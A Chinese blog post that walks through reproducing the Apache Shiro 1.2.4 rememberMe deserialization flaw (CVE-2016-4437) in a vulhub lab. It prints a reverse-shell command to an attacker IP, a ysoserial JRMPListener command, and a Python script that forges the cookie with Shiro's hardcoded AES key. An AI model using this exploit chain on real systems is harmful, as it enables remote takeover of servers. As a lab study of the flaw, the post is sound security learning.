Apache Shiro 1.2.4反序列化漏洞（CVE-2016-4437）

曾经终败给现在 2023-10-08 19:33 11阅读 0赞

#### 目录 ####

*  Apache Shiro简介
 *  漏洞原理
 *  影响版本
 *  漏洞复现

**声明：本文仅供学习参考，其中涉及的一切资源均来源于网络，请勿用于任何非法行为，否则您将自行承担相应后果，本人不承担任何法律及连带责任。**

## Apache Shiro简介 ##

Apache Shiro是一个Java安全框架，执行身份验证、授权、密码和会话管理。

## 漏洞原理 ##

Apache Shiro框架提供了记住我（rememberMe）的功能，关闭了浏览器下次再打开时还是能记住你是谁，下次访问时无需再登录即可访问。Shiro对rememberMe的cookie做了加密处理，shiro在CookieRememberMeManage类中将cookie中rememberMe字段内容分别进行序列化、AES加密、Base64编码。

\*\*漏洞分析：\*\*Apache Shiro默认使用了CookieRememberMeManage，其处理cookie是的流程是：得到rememberMe的cookie值 > Base64解码 > AES解密 > 反序列化。然而AES的密钥是硬编码的，就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞

\*\*漏洞特征：\*\*在返回包的Set-Cookie中存在rememberMe=deleteMe字段

## 影响版本 ##

Apache Shiro <= 1.2.4

## 漏洞复现 ##

漏洞环境搭建采用vulhub，具体方式，这里不在赘述。环境启动后，浏览器访问一下

![在这里插入图片描述][ad09a55da74b48f59efbe49592ee3a76.png]  
我们利用漏洞的最终目的是要远程执行命令（反弹shell），来获取服务器的权限

所以，我们先在攻击机上起nc监听

![在这里插入图片描述][718107808455460680de5b1192985987.png]

然后，将反弹shell命令：bash -i >& /dev/tcp/192.168.40.86/1234 0>&1，在https://ares-x.com/tools/runtime-exec/网站上做编码处理。

编码处理后：bash -c \{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQwLjg2LzEyMzQgMD4mMQ==\}|\{base64,-d\}|\{bash,-i\}  
![在这里插入图片描述][d8d916603a984e279406137902232674.png]  
备注：做这一步编码处理的原因是：Java下命令执行使用到的Runtime.getRuntime().exec(cmd)，在处理带有| ,<,>,空格等符号的命令时，没办法正确执行，所以做Base64编码处理

Java反序列化漏洞利用，需要用到ysoserial这一个反序列化利用工具，而我们这次使用到的是其中的JRMP模块

**JRMP模块利用方式如下：**

一、 ysoserial中的exploit/JRMPClient是作为攻击方的代码，一般会结合payloads/JRMPLIstener使用。

攻击流程如下：

需要发送payloads/JRMPLIstener内容到漏洞服务器中，在该服务器反序列化完成我们的payload后会开启一个RMI的服务监听在设置的端口上。  
我们还需要在我们自己的服务器使用exploit/JRMPClient与存在漏洞的服务器进行通信，并且发送一个gadgets对象，达到一个命令执行的效果。(前面说过RMI协议在传输都是传递序列化，接收数据后进行反序列化操作。)  
简单来说就是将一个payload发送到服务器，服务器反序列化操作该payload过后会在指定的端口开启RMI监听，然后通过exploit/JRMPClient 去发送攻击 gadgets对象。

二、第二种利用方式和上面的类似，exploit/JRMPListener作为攻击方进行监听,在反序列化漏洞位置发送payloads/JRMPClient向我们的exploit/JRMPListener进行连接，连接后会返回在exploit/JRMPListener的gadgets对象并且进行反序列化

攻击流程如下：

攻击方在自己的服务器使用exploit/JRMPListener开启一个rmi监听  
往存在漏洞的服务器发送payloads/JRMPClient，payload中已经设置了攻击者服务器ip及JRMPListener监听的端口，漏洞服务器反序列化该payload后，会去连接攻击者开启的rmi监听，在通信过程中，攻击者服务器会发送一个可执行命令的payload（假如存在漏洞的服务器中有使用org.apacje.commons.collections包，则可以发送CommonsCollections系列的payload），从而达到命令执行的结果。

**针对该漏洞，我们采用第二种利用方式**

github上搜索并下载、编译ysoserial，得到ysoserial.jar包

运行指令（通过 ysoserial中的JRMP监听模块，监听 6666 端口并执行反弹shell命令）

`java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections5 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQwLjg2LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}'`

![在这里插入图片描述][68ad1dd9dc724214bd5cf42a0af1a915.png]

接下来，编写脚本伪造cookie，脚本如下：

import sys
    import uuid
    import base64
    import subprocess
    from Crypto.Cipher import AES
    def encode_rememberme(command):
        popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'JRMPClient', command], stdout=subprocess.PIPE)
        BS = AES.block_size
        pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
        key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
        iv = uuid.uuid4().bytes
        encryptor = AES.new(key, AES.MODE_CBC, iv)
        file_body = pad(popen.stdout.read())
        base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
        return base64_ciphertext
     
    if __name__ == '__main__':
        payload = encode_rememberme(sys.argv[1])   
    print ("rememberMe={0}".format(payload.decode()))

执行脚本 : python3 shiro.py 192.168.40.86:6666  
![在这里插入图片描述][861ee69c0d3c4ffd842be82144ec0600.png]  
页面登录，输入任意用户名和密码，并勾选Remember me ，BP抓包，并替换掉cookie内容

![在这里插入图片描述][10c71951dcef402b8a1ea8603036b5f1.png]  
查看JRMPListener监听，可以看到JRMPClient的连接

![在这里插入图片描述][a9e61fa208184ba88a50b75f2b6af7eb.png]  
查看nc反弹shell成功

![在这里插入图片描述][80ad20d8544040e6b018a595b66e26b3.png]

[ad09a55da74b48f59efbe49592ee3a76.png]: https://img-blog.csdnimg.cn/ad09a55da74b48f59efbe49592ee3a76.png
[718107808455460680de5b1192985987.png]: https://img-blog.csdnimg.cn/718107808455460680de5b1192985987.png
[d8d916603a984e279406137902232674.png]: https://img-blog.csdnimg.cn/d8d916603a984e279406137902232674.png
[68ad1dd9dc724214bd5cf42a0af1a915.png]: https://img-blog.csdnimg.cn/68ad1dd9dc724214bd5cf42a0af1a915.png
[861ee69c0d3c4ffd842be82144ec0600.png]: https://img-blog.csdnimg.cn/861ee69c0d3c4ffd842be82144ec0600.png
[10c71951dcef402b8a1ea8603036b5f1.png]: https://img-blog.csdnimg.cn/10c71951dcef402b8a1ea8603036b5f1.png
[a9e61fa208184ba88a50b75f2b6af7eb.png]: https://img-blog.csdnimg.cn/a9e61fa208184ba88a50b75f2b6af7eb.png
[80ad20d8544040e6b018a595b66e26b3.png]: https://img-blog.csdnimg.cn/80ad20d8544040e6b018a595b66e26b3.png